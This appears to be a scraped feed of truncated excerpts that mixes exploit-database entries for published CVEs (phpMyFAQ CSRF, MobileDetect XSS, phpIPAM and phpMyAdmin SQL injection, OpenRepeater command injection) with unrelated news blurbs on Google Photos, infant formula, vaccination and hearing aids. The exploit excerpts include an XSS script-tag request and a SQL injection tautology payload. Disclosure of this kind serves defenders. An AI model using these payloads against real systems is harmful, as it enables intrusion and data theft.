# Exploit Title: phpMyFaq 2.9.8 – Cross Site Request Forgery (CSRF) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpMyFAQ/ # Software Link: https://github.com/thorsten/phpMyFAQ/ # Version: 2.9.8 # Tested on: Windows 10 # CVE : CVE-2017-15808 PoC: Steps to Reproduce: 1. Save the…
Another year is almost in the books, and it’s time to look back at the moments that made it memorable. Last year, we introduced Google Photos Recap to help you rediscover what made your year special. Now, Recap is back for 2025, turning your photos and videos from the past year into a highlight reel…
Parents will be able to use gift vouchers and supermarket loyalty points to buy infant formula under a government plan to make baby milk more affordable. Under the new measures, parents will be given clearer guidance on the nutritional standards, which need to be met by all formula sold in the UK, and encourage retailers…
Summary As routine and seasonal vaccination rates continue to decline among children, racial disparities in vaccination rates persist. Declining vaccination rates leave children at increased risk for preventable illnesses, while disparities leave some children at greater risk relative to others. Research shows that many childhood diseases require a high level of vaccination within the population…
“I’ve tried different brands of hearing aids, and they’re good, but they’re not this good,” says Martin in a Zoom interview. He visited the team in Soho, did the street test, and was delighted when he tried it with his wife and daughter at their favorite restaurant, with de Jonge sitting with the laptop several…
# Exploit Title: MobileDetect 2.8.31 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. …
At the European Health Summit in Brussels, Greg Corrado, Distinguished Scientist at Google, released a new report authored by Implement Consulting Group and commissioned by Google revealing that AI is reversing the long-term trend of slowing scientific productivity, providing a turning point for a European healthcare system grappling with rising costs and workforce shortages. The…
# Exploit Title: phpIPAM 1.4 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.4 # Tested on: Windows # CVE : CVE-2019-16693 Proof Of Concept # Ensure you have a valid user session before executing the PoC. POST /app/admin/custom-fields/order.php…
# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…
# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…
